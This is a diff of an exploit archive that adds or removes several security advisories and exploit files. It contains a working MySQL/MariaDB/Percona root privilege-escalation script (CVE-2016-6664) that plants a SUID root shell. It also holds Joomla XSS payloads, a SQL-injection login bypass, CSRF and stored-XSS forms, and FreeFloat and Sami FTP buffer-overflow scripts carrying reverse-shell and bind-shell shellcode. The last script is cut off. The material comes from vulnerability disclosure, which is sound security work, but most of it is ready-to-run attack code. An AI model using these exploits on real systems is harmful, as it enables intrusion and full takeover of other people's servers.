+for mysql service restart/reboot) by attackers having 'mysql' account by simply 
+killing the mysqld child process (launched by the mysqld_safe wrapper).
+
+When the mysqld process gets terminated, the wrapper will then re-itertate the 
+loop shown above and immediately create a mysql-owned file in the location 
+specified by the attacker in the symlink thus allowing attackers to quickly
+escalate their privileges.
+
+
+V. PROOF OF CONCEPT EXPLOIT
+-------------------------
+
+-------[ mysql-chowned.sh ]------
+
+#!/bin/bash -p
+#
+# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit
+# mysql-chowned.sh (ver. 1.0)
+#
+# CVE-2016-6664 / OCVE-2016-5617
+#
+# Discovered and coded by:
+#
+# Dawid Golunski
+# dawid[at]legalhackers.com
+#
+# http://legalhackers.com
+#
+#
+# This PoC exploit allows attackers to (instantly) escalate their privileges
+# from mysql system account to root through unsafe error log handling.
+# The exploit requires that file-based logging has been configured (default).
+# To confirm that syslog logging has not been enabled instead use:
+# grep -r syslog /etc/mysql
+# which should return no results.
+#
+# This exploit can be chained with the following vulnerability:
+# CVE-2016-6663 / OCVE-2016-5616
+# which allows attackers to gain access to mysql system account (mysql shell).
+#
+# In case database server has been configured with syslog you may also use:
+# CVE-2016-6662 as an alternative to this exploit.
+#
+# Usage:
+# ./mysql-chowned.sh path_to_error.log 
+#
+# See full advisory for details at:
+#
+# http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
+#
+# Disclaimer:
+# For testing purposes only. Do no harm.
+#
+
+BACKDOORSH="/bin/bash"
+BACKDOORPATH="/tmp/mysqlrootsh"
+PRIVESCLIB="/tmp/privesclib.so"
+PRIVESCSRC="/tmp/privesclib.c"
+SUIDBIN="/usr/bin/sudo"
+
+function cleanexit {
+	# Cleanup 
+	echo -e "\n[+] Cleaning up..."
+	rm -f $PRIVESCSRC
+	rm -f $PRIVESCLIB
+	rm -f $ERRORLOG
+	touch $ERRORLOG
+	if [ -f /etc/ld.so.preload ]; then
+		echo -n > /etc/ld.so.preload
+	fi
+	echo -e "\n[+] Job done. Exiting with code $1 \n"
+	exit $1
+}
+
+function ctrl_c() {
+        echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
+	cleanexit 0
+}
+
+#intro 
+echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n"
+echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"
+
+# Args
+if [ $# -lt 1 ]; then
+	echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"
+	echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"
+	exit 3
+fi
+
+# Priv check
+
+echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m"
+id | grep -q mysql 
+if [ $? -ne 0 ]; then
+	echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n"
+	exit 3
+fi
+
+# Set target paths
+ERRORLOG="$1"
+if [ ! -f $ERRORLOG ]; then
+	echo -e "\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n"
+	exit 3
+fi
+echo -e "\n[+] Target MySQL log file set to $ERRORLOG"
+
+# [ Active exploitation ]
+
+trap ctrl_c INT
+# Compile privesc preload library
+echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
+cat <<_solibeof_>$PRIVESCSRC
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <dlfcn.h>
+       #include <sys/types.h>
+       #include <sys/stat.h>
+       #include <fcntl.h>
+
+uid_t geteuid(void) {
+	static uid_t  (*old_geteuid)();
+	old_geteuid = dlsym(RTLD_NEXT, "geteuid");
+	if ( old_geteuid() == 0 ) {
+		chown("$BACKDOORPATH", 0, 0);
+		chmod("$BACKDOORPATH", 04777);
+		//unlink("/etc/ld.so.preload");
+	}
+	return old_geteuid();
+}
+_solibeof_
+/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
+if [ $? -ne 0 ]; then
+	echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
+	cleanexit 2;
+fi
+
+
+# Prepare backdoor shell
+cp $BACKDOORSH $BACKDOORPATH
+echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
+
+# Safety check
+if [ -f /etc/ld.so.preload ]; then
+	echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
+	exit 2
+fi
+
+# Symlink the log file to /etc
+rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG
+if [ $? -ne 0 ]; then
+	echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
+	cleanexit 3
+fi
+echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`"
+
+# Wait for MySQL to re-open the logs
+echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n"
+read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER
+if [ "$THE_ANSWER" = "y" ]; then
+	echo -e "Got it. Executing 'killall mysqld' now..."
+	killall mysqld
+fi
+while :; do 
+	sleep 0.1
+	if [ -f /etc/ld.so.preload ]; then
+		echo $PRIVESCLIB > /etc/ld.so.preload
+		rm -f $ERRORLOG
+		break;
+	fi
+done
+
+# /etc/	dir should be owned by mysql user at this point
+# Inject the privesc.so shared library to escalate privileges
+echo $PRIVESCLIB > /etc/ld.so.preload
+echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`"
+echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
+echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
+chmod 755 /etc/ld.so.preload
+
+# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
+echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
+sudo 2>/dev/null >/dev/null
+
+#while :; do 
+#	sleep 0.1
+#	ps aux | grep mysqld | grep -q 'log-error'
+#	if [ $? -eq 0 ]; then
+#		break;
+#	fi
+#done
+
+# Check for the rootshell
+ls -l $BACKDOORPATH
+ls -l $BACKDOORPATH | grep rws | grep -q root
+if [ $? -eq 0 ]; then 
+	echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
+	echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m"
+else
+	echo -e "\n[!] Failed to get root"
+	cleanexit 2
+fi
+
+
+# Execute the rootshell
+echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
+$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
+$BACKDOORPATH -p
+
+# Job done.
+cleanexit 0
+
+
+
+------------EOF------------------
+
+
+Example run
+~~~~~~~~~~~~~~~~
+
+mysql_suid_shell.MYD-4.3$ whoami
+mysql
+
+omysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server
+iU  percona-server-server              5.6.32-78.0-1.xenial              amd64        Percona Server database server
+iF  percona-server-server-5.6          5.6.32-78.0-1.xenial              amd64        Percona Server database server binaries
+
+mysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err 
+ 
+MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit 
+mysql-chowned.sh (ver. 1.0)
+
+CVE-2016-6664 / OCVE-2016-5617
+
+Discovered and coded by: 
+
+Dawid Golunski 
+http://legalhackers.com 
+
+[+] Starting the exploit as 
+uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)
+
+[+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err
+
+[+] Compiling the privesc shared library (/tmp/privesclib.c)
+
+[+] Backdoor/low-priv shell installed at: 
+-rwxr-xr-x 1 mysql attacker 1037528 Nov  1 05:08 /tmp/mysqlrootsh
+
+[+] Symlink created at: 
+lrwxrwxrwx 1 mysql attacker 18 Nov  1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload
+
+[+] Waiting for MySQL to re-open the logs/MySQL service restart...
+Do you want to kill mysqld process to instantly get root? :) ? [y/n] y
+Got it. Executing 'killall mysqld' now...
+
+[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: 
+-rw-r----- 1 mysql root 19 Nov  1 05:08 /etc/ld.so.preload
+
+[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
+
+[+] The /etc/ld.so.preload file now contains: 
+/tmp/privesclib.so
+
+[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
+-rwsrwxrwx 1 root root 1037528 Nov  1 05:08 /tmp/mysqlrootsh
+
+[+] Rootshell got assigned root SUID perms at: 
+-rwsrwxrwx 1 root root 1037528 Nov  1 05:08 /tmp/mysqlrootsh
+
+Got root! The database server has been ch-OWNED !
+
+[+] Spawning the rootshell /tmp/mysqlrootsh now! 
+
+mysqlrootsh-4.3# whoami
+root
+
+mysqlrootsh-4.3# exit
+exit
+
+[+] Cleaning up...
+
+[+] Job done. Exiting with code 0
+
+
+
+Video PoC:
+~~~~~~~~~~~~~
+
+http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
+
+
+VI. BUSINESS IMPACT
+-------------------------
+
+Attackers who obtained mysql account through other vulnerabilities
+(such as CVE-2016-6663) could use this exploit to gain root access
+and fully compromise the system.
+ 
+VII. SYSTEMS AFFECTED
+-------------------------
+
+MySQL  
+	<= 5.5.51
+	<= 5.6.32
+	<= 5.7.14
+
+MariaDB
+	All current
+
+Percona Server
+	< 5.5.51-38.2
+	< 5.6.32-78-1
+	< 5.7.14-8
+
+Percona XtraDB Cluster
+	< 5.6.32-25.17
+	< 5.7.14-26.17
+	< 5.5.41-37.0
+ 
+VIII. SOLUTION
+-------------------------
+
+Vendors have released patches after private disclosure.
+Update to the latest version of your DBMS.
+
+ 
+IX. REFERENCES
+-------------------------
+
+http://legalhackers.com
+
+This advisory:
+http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
+
+Exploit source code:
+http://legalhackers.com/exploits/mysql-chowned.sh
+
+CVE-2016-6663 vulnerability which can allow attackers to obtain 'mysql' system account:
+http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
+
+Video PoC:
+http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
+
+CVE-2016-6664
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664
+
+http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL
+
+
+
+X. CREDITS
+-------------------------
+
+The vulnerability has been discovered by Dawid Golunski
+dawid (at) legalhackers (dot) com
+
+http://legalhackers.com
+ 
+XI. REVISION HISTORY
+-------------------------
+
+01.11.2016 - Advisory released
+ 
+
+XII. LEGAL NOTICES
+-------------------------
+
+The information contained within this advisory is supplied "as-is" with
+no warranties or guarantees of fitness of use or otherwise. I accept no
+responsibility for any damage caused by the use or misuse of this information.

platforms/php/webapps/37473.txt

@@ -1,13 +0,0 @@
-source: http://www.securityfocus.com/bid/54259/info
-
-Joomla! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
-
-An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
-
-Joomla! 2.5.6 is vulnerable; other versions may also be affected. 
-
-http://www.example.com/joomla/index.php/image-gallery/"><script>alert(document.cookie)</script>/25-koala
-http://www.example.com/joomla/index.php/image-gallery/"><script>alert('xss')</script>/25-koala
-
-http://www.example.com/joomla/index.php/image-gallery/animals/25-"><script>alert(document.cookie)</script>
-http://www.example.com/joomla/index.php/image-gallery/animals/25-"><script>alert('xss')</script>

platforms/php/webapps/40511.txt

@@ -8,6 +8,6 @@
 # Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools
 
 ################################################################
-PoC =3D http://localhost/cms/categorizator/vote.php?id_site=1'
+PoC : http://localhost/cms/categorizator/vote.php?id_site=1'
 ################################################################
 

platforms/php/webapps/40671.txt

@@ -0,0 +1,59 @@
+# Exploit Title.............. School Registration and Fee System Auth Bypass
+# Google Dork................ N/A
+# Date....................... 01/11/2016
+# Exploit Author............. opt1lc
+# Vendor Homepage............ http://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html
+# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/hemedy99/bilal_final.zip
+# Version.................... N/A
+# Tested on.................. XAMPP
+# CVE........................ N/A
+
+# File....................... bilal_final/login.php
+---------------------------------------------------
+
+		----snip----
+
+		$username = $_POST['username'];
+		$password = $_POST['password'];
+		/* student */
+		$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
+		$result = mysql_query($query)or die(mysql_error());
+		$row = mysql_fetch_array($result);
+		----snip----
+
+---------------------------------------------------
+
+Exploit 
+-------
+You can login with username and password : administrator' or '1'='1 
+
+
+Patching
+-------
+You can use one of function in PHP : mysql_real_escape_string() to 
+---------------------------------------------------
+
+		----snip----
+
+		$username = mysql_real_escape_string($_POST['username']);
+		$password = mysql_real_escape_string($_POST['password']);
+		/* student */
+		$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
+		$result = mysql_query($query)or die(mysql_error());
+		$row = mysql_fetch_array($result);
+		----snip----
+
+---------------------------------------------------
+
+Credit
+-------
+This vulnerability was discovered and researched by opt1lc
+
+Shout
+-------
+My Beautiful Daughter & My Wife
+
+Reference
+-------
+http://php.net/manual/en/function.mysql-real-escape-string.php
+

platforms/php/webapps/40676.txt

@@ -0,0 +1,86 @@
+Title:
+======
+My Little Forum  2.3.7 - Multiple Vulnerability
+
+
+Product & Service Introduction:
+===============================
+My little forum is a simple PHP and MySQL based internet forum that 
+displays the messages in classical threaded view (tree structure). It is 
+Open Source licensed under the GNU General Public License. The main 
+claim of this web forum is simplicity. Furthermore it should be easy to 
+install and run on a standard server configuration with PHP and MySQL.
+
+
+Software Link:
+==============
+https://github.com/ilosuna/mylittleforum/archive/master.zip
+
+
+Vulnerability Type:
+=========================
+Cross-Site Request Forgery
+Stored Cross-Site Scripting
+CSRF Allow To Backup Disclosure
+
+
+Vulnerability Details:
+==============================
+This WebApplication is vulnerable and suffer from some vulnerablity.
+
+
+Severity Level:
+===============
+High
+
+
+Proof of Concept (PoC):
+=======================
+1. CSRF (Add Page)
+With this exploit can add page in webapp.
+<form 
+action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page" 
+method="post" accept-charset="utf-8">
+<input type="hidden" name="mode" value="admin">
+<input type="hidden" name="title" value="Title">
+<input type="hidden" name="content" value="Content">
+<input type="hidden" name="menu_linkname" value="Name">
+<input type="submit" name="edit_page_submit" value="OK - Save page">
+</form>
+
+
+2. Stored XSS:
+<form 
+action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page" 
+method="post" accept-charset="utf-8">
+<input type="hidden" name="mode" value="admin">
+<input type="hidden" name="title" value="Stored XSS 
+<script>alert(1)</script>">
+<input type="hidden" name="content" value="Stored XSS 
+<script>alert(2)</script>">
+<input type="hidden" name="menu_linkname" value="Stored XSS 
+<script>alert(3)</script>">
+<input type="submit" name="edit_page_submit" value="OK - Save page">
+</form>
+
+3. Backup Disclosure:
+with this exploit we can delect htaccess in backup folder for access to 
+backups.
+<form action="http://localhost/mylittleforum-master/index.php" 
+method="post" accept-charset="utf-8">
+<div>
+<input type="hidden" name="mode" value="admin">
+<input type="hidden" name="delete_backup_files[]" value=".htaccess">
+<input type="submit" name="delete_backup_files_confirm" value="OK - 
+Delete">
+</div>
+</form>
+Next use exploit go to:
+http://localhost/mylittleforum-master/backup/
+
+
+
+Author:
+==================
+Ashiyane Digital Security Team
+

platforms/windows/remote/40672.py

@@ -0,0 +1,63 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+import socket
+
+
+#Exploit Title: FreeFloat FTP Server Buffer Overflow RMD command
+#Date: 29 Octubre 2016
+#Exploit Author: Karri93
+#Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
+#Version: 1.0
+#Tested on: Windows XP Profesional SP3 Spanish x86 
+
+
+#Shellcode Metasploit:
+#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f -c 
+#nc -lvp 443
+
+
+ret= "\x2F\x1D\xF1\x77" #GDI32.dll
+
+shellcode=("\xd9\xc4\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\xba\x9b\x84\x71"
+"\xb0\x83\xc3\x04\x31\x53\x13\x03\xc8\x97\x93\x45\x12\x7f\xd1"
+"\xa6\xea\x80\xb6\x2f\x0f\xb1\xf6\x54\x44\xe2\xc6\x1f\x08\x0f"
+"\xac\x72\xb8\x84\xc0\x5a\xcf\x2d\x6e\xbd\xfe\xae\xc3\xfd\x61"
+"\x2d\x1e\xd2\x41\x0c\xd1\x27\x80\x49\x0c\xc5\xd0\x02\x5a\x78"
+"\xc4\x27\x16\x41\x6f\x7b\xb6\xc1\x8c\xcc\xb9\xe0\x03\x46\xe0"
+"\x22\xa2\x8b\x98\x6a\xbc\xc8\xa5\x25\x37\x3a\x51\xb4\x91\x72"
+"\x9a\x1b\xdc\xba\x69\x65\x19\x7c\x92\x10\x53\x7e\x2f\x23\xa0"
+"\xfc\xeb\xa6\x32\xa6\x78\x10\x9e\x56\xac\xc7\x55\x54\x19\x83"
+"\x31\x79\x9c\x40\x4a\x85\x15\x67\x9c\x0f\x6d\x4c\x38\x4b\x35"
+"\xed\x19\x31\x98\x12\x79\x9a\x45\xb7\xf2\x37\x91\xca\x59\x50"
+"\x56\xe7\x61\xa0\xf0\x70\x12\x92\x5f\x2b\xbc\x9e\x28\xf5\x3b"
+"\xe0\x02\x41\xd3\x1f\xad\xb2\xfa\xdb\xf9\xe2\x94\xca\x81\x68"
+"\x64\xf2\x57\x3e\x34\x5c\x08\xff\xe4\x1c\xf8\x97\xee\x92\x27"
+"\x87\x11\x79\x40\x22\xe8\xea\xaf\x1b\xf3\xed\x47\x5e\xf3\xf0"
+"\x2c\xd7\x15\x98\x42\xbe\x8e\x35\xfa\x9b\x44\xa7\x03\x36\x21"
+"\xe7\x88\xb5\xd6\xa6\x78\xb3\xc4\x5f\x89\x8e\xb6\xf6\x96\x24"
+"\xde\x95\x05\xa3\x1e\xd3\x35\x7c\x49\xb4\x88\x75\x1f\x28\xb2"
+"\x2f\x3d\xb1\x22\x17\x85\x6e\x97\x96\x04\xe2\xa3\xbc\x16\x3a"
+"\x2b\xf9\x42\x92\x7a\x57\x3c\x54\xd5\x19\x96\x0e\x8a\xf3\x7e"
+"\xd6\xe0\xc3\xf8\xd7\x2c\xb2\xe4\x66\x99\x83\x1b\x46\x4d\x04"
+"\x64\xba\xed\xeb\xbf\x7e\x1d\xa6\x9d\xd7\xb6\x6f\x74\x6a\xdb"
+"\x8f\xa3\xa9\xe2\x13\x41\x52\x11\x0b\x20\x57\x5d\x8b\xd9\x25"
+"\xce\x7e\xdd\x9a\xef\xaa")
+
+buffer= '\x90'*30 + shellcode
+buffer1= '\x41' * 248 + ret + buffer + '\x43'*(696-len(buffer)) 
+print "Sending..."
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(('192.168.1.150',21))
+s.recv(1024)
+s.send('USER free\r\n')
+s.recv(1024)
+s.send('PASS free\r\n')
+s.recv(1024)
+s.send('RMD' + buffer1 + '\r\n')
+s.close()
+
+
+
+
+

platforms/windows/remote/40673.py

@@ -0,0 +1,61 @@
+#!/usr/bin/env python
+#-*- coding: utf-8 -*-
+
+# Exploit Title: FreeFloat FTP Server HOST Command Buffer Overflow Exploit
+# Date: 30/10/2016
+# Exploit Author: Cybernetic
+# Software Link:  http://www.freefloat.com/software/freefloatftpserver.zip
+# Version: 1.00
+# Tested on: Windows XP Profesional SP3 ESP x86
+# CVE : N/A
+
+import socket, os, sys
+ret="\xC7\x31\x6B\x7E" #Shell32.dll 7E6B31C7
+
+#Metasploit Shellcode
+#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c
+
+#nc -lvp 443
+#Send exploit
+
+shellcode=("\xbb\x89\x62\x48\xda\xdb\xda\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
+"\x52\x31\x5a\x12\x03\x5a\x12\x83\x4b\x66\xaa\x2f\xb7\x8f\xa8"
+"\xd0\x47\x50\xcd\x59\xa2\x61\xcd\x3e\xa7\xd2\xfd\x35\xe5\xde"
+"\x76\x1b\x1d\x54\xfa\xb4\x12\xdd\xb1\xe2\x1d\xde\xea\xd7\x3c"
+"\x5c\xf1\x0b\x9e\x5d\x3a\x5e\xdf\x9a\x27\x93\x8d\x73\x23\x06"
+"\x21\xf7\x79\x9b\xca\x4b\x6f\x9b\x2f\x1b\x8e\x8a\xfe\x17\xc9"
+"\x0c\x01\xfb\x61\x05\x19\x18\x4f\xdf\x92\xea\x3b\xde\x72\x23"
+"\xc3\x4d\xbb\x8b\x36\x8f\xfc\x2c\xa9\xfa\xf4\x4e\x54\xfd\xc3"
+"\x2d\x82\x88\xd7\x96\x41\x2a\x33\x26\x85\xad\xb0\x24\x62\xb9"
+"\x9e\x28\x75\x6e\x95\x55\xfe\x91\x79\xdc\x44\xb6\x5d\x84\x1f"
+"\xd7\xc4\x60\xf1\xe8\x16\xcb\xae\x4c\x5d\xe6\xbb\xfc\x3c\x6f"
+"\x0f\xcd\xbe\x6f\x07\x46\xcd\x5d\x88\xfc\x59\xee\x41\xdb\x9e"
+"\x11\x78\x9b\x30\xec\x83\xdc\x19\x2b\xd7\x8c\x31\x9a\x58\x47"
+"\xc1\x23\x8d\xc8\x91\x8b\x7e\xa9\x41\x6c\x2f\x41\x8b\x63\x10"
+"\x71\xb4\xa9\x39\x18\x4f\x3a\x86\x75\x4e\xde\x6e\x84\x50\x1f"
+"\xd4\x01\xb6\x75\x3a\x44\x61\xe2\xa3\xcd\xf9\x93\x2c\xd8\x84"
+"\x94\xa7\xef\x79\x5a\x40\x85\x69\x0b\xa0\xd0\xd3\x9a\xbf\xce"
+"\x7b\x40\x2d\x95\x7b\x0f\x4e\x02\x2c\x58\xa0\x5b\xb8\x74\x9b"
+"\xf5\xde\x84\x7d\x3d\x5a\x53\xbe\xc0\x63\x16\xfa\xe6\x73\xee"
+"\x03\xa3\x27\xbe\x55\x7d\x91\x78\x0c\xcf\x4b\xd3\xe3\x99\x1b"
+"\xa2\xcf\x19\x5d\xab\x05\xec\x81\x1a\xf0\xa9\xbe\x93\x94\x3d"
+"\xc7\xc9\x04\xc1\x12\x4a\x34\x88\x3e\xfb\xdd\x55\xab\xb9\x83"
+"\x65\x06\xfd\xbd\xe5\xa2\x7e\x3a\xf5\xc7\x7b\x06\xb1\x34\xf6"
+"\x17\x54\x3a\xa5\x18\x7d")
+
+shell= '\x90'*30 + shellcode
+buffer='\x41'*247 + ret + shell + '\x43'*(696-len(shell))
+
+print "Sending Buffer"
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(('10.10.10.10',21))
+s.recv(1024)
+s.send('USER test \r\n')
+s.recv(1024)
+s.send('PASS test \r\n')
+s.recv(1024)
+s.send('HOST' +buffer+ '\r\n')
+s.close()
+print "Attack Buffer Overflow Successfully Executed"
+

platforms/windows/remote/40674.py

@@ -0,0 +1,55 @@
+#!/usr/bin/env python
+#-*- coding: utf-8 -*-
+
+# Exploit Title: FreeFloat FTP Server BoF ABOR Command
+# Date: 29/10/2016
+# Exploit Author: Ger
+# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
+# Version: 1.0
+# Tested on: Windows XP Profesional V. 2002 Service Pack 3
+# CVE : n/a
+
+import socket
+#shellcode with metasploit
+#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.74.132 LPORT=443 -b '\x00\x0d\x0a' -f c
+#nc -lvp 443
+#send the exploit
+ret='\x73\x18\x6E\x74' #MSCTF.dll
+shellcode=("\xdd\xc6\xd9\x74\x24\xf4\x5d\xb8\x2a\xb4\x5a\x74\x29\xc9\xb1"
+"\x52\x31\x45\x17\x03\x45\x17\x83\xef\xb0\xb8\x81\x13\x50\xbe"
+"\x6a\xeb\xa1\xdf\xe3\x0e\x90\xdf\x90\x5b\x83\xef\xd3\x09\x28"
+"\x9b\xb6\xb9\xbb\xe9\x1e\xce\x0c\x47\x79\xe1\x8d\xf4\xb9\x60"
+"\x0e\x07\xee\x42\x2f\xc8\xe3\x83\x68\x35\x09\xd1\x21\x31\xbc"
+"\xc5\x46\x0f\x7d\x6e\x14\x81\x05\x93\xed\xa0\x24\x02\x65\xfb"
+"\xe6\xa5\xaa\x77\xaf\xbd\xaf\xb2\x79\x36\x1b\x48\x78\x9e\x55"
+"\xb1\xd7\xdf\x59\x40\x29\x18\x5d\xbb\x5c\x50\x9d\x46\x67\xa7"
+"\xdf\x9c\xe2\x33\x47\x56\x54\x9f\x79\xbb\x03\x54\x75\x70\x47"
+"\x32\x9a\x87\x84\x49\xa6\x0c\x2b\x9d\x2e\x56\x08\x39\x6a\x0c"
+"\x31\x18\xd6\xe3\x4e\x7a\xb9\x5c\xeb\xf1\x54\x88\x86\x58\x31"
+"\x7d\xab\x62\xc1\xe9\xbc\x11\xf3\xb6\x16\xbd\xbf\x3f\xb1\x3a"
+"\xbf\x15\x05\xd4\x3e\x96\x76\xfd\x84\xc2\x26\x95\x2d\x6b\xad"
+"\x65\xd1\xbe\x62\x35\x7d\x11\xc3\xe5\x3d\xc1\xab\xef\xb1\x3e"
+"\xcb\x10\x18\x57\x66\xeb\xcb\x98\xdf\xb9\x8f\x71\x22\x3d\x91"
+"\x3a\xab\xdb\xfb\x2c\xfa\x74\x94\xd5\xa7\x0e\x05\x19\x72\x6b"
+"\x05\x91\x71\x8c\xc8\x52\xff\x9e\xbd\x92\x4a\xfc\x68\xac\x60"
+"\x68\xf6\x3f\xef\x68\x71\x5c\xb8\x3f\xd6\x92\xb1\xd5\xca\x8d"
+"\x6b\xcb\x16\x4b\x53\x4f\xcd\xa8\x5a\x4e\x80\x95\x78\x40\x5c"
+"\x15\xc5\x34\x30\x40\x93\xe2\xf6\x3a\x55\x5c\xa1\x91\x3f\x08"
+"\x34\xda\xff\x4e\x39\x37\x76\xae\x88\xee\xcf\xd1\x25\x67\xd8"
+"\xaa\x5b\x17\x27\x61\xd8\x27\x62\x2b\x49\xa0\x2b\xbe\xcb\xad"
+"\xcb\x15\x0f\xc8\x4f\x9f\xf0\x2f\x4f\xea\xf5\x74\xd7\x07\x84"
+"\xe5\xb2\x27\x3b\x05\x97")
+buffer='\x90'*20 + shellcode
+buffer1='\x41'*247 +  ret + buffer + '\x43'*(696-len(buffer))
+
+print "Sending Buffer" 
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(('192.168.74.133', 21))
+s.recv(1024) 
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+s.recv(1024)
+s.send('ABOR' + buffer1 + '\r\n')
+s.close()

platforms/windows/remote/40675.py

@@ -0,0 +1,99 @@
+#/usr/bin/python
+#-*- Coding: utf-8 -*-
+
+### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### 
+
+# Date: 2016-01-11
+# Exploit Author: n30m1nd
+# Vendor Homepage: http://www.karjasoft.com/
+# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
+# Version: 2.0.2
+# Tested on: Win7 64bit and Win10 64 bit
+
+# Credits
+# =======
+# Thanks to PHRACK for maintaining all the articles up for so much time... 
+# These are priceless and still current for exploit development!!
+# Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better
+
+# How to
+# ======
+# * Open Sami FTP Server and open its graphical interface
+# * Run this python script and write the IP to attack
+# * Connect to the same IP on port 4444
+#
+# BONUS
+# =====
+# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each
+# start and so, it will crash and run our shellcode everytime it starts.
+
+# Why?
+# ====
+# The graphical interface tries to show the user name which produces an overflow overwriting SEH
+
+# Exploit code
+# ============
+
+import socket
+import struct
+
+def doHavoc(ipaddr):
+    # Bad chars: 00 0d 0a ff
+    alignment = "\x90"*3
+    
+    jmpfront = "345A7504".decode('hex')
+    #CPU Disasm
+    #Hex dump          Command 
+    #  34 5A           XOR AL,5A
+    #  75 04           JNE SHORT +04
+    
+    # pop pop ret in tmp01.dll
+    popret = 0x10022ADE
+    
+    # fstenv trick to get eip: phrack number 62
+    # and store it into EAX for the metasploit shell (BufferRegister)
+    getEIPinEAX = "D9EED934E48B44E40C040b".decode('hex')
+    #CPU Disasm
+    #Hex dump          Command
+    #  D9EE            FLDZ
+    #  D934E4          FSTENV SS:[ESP]
+    #  8B44E4 0C       MOV EAX,DWORD PTR SS:[ESP+0C]
+    #  04 0B           ADD AL,0B
+
+    # Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX
+    shellcode = (
+        getEIPinEAX + 
+        "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p"
+        "e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq"
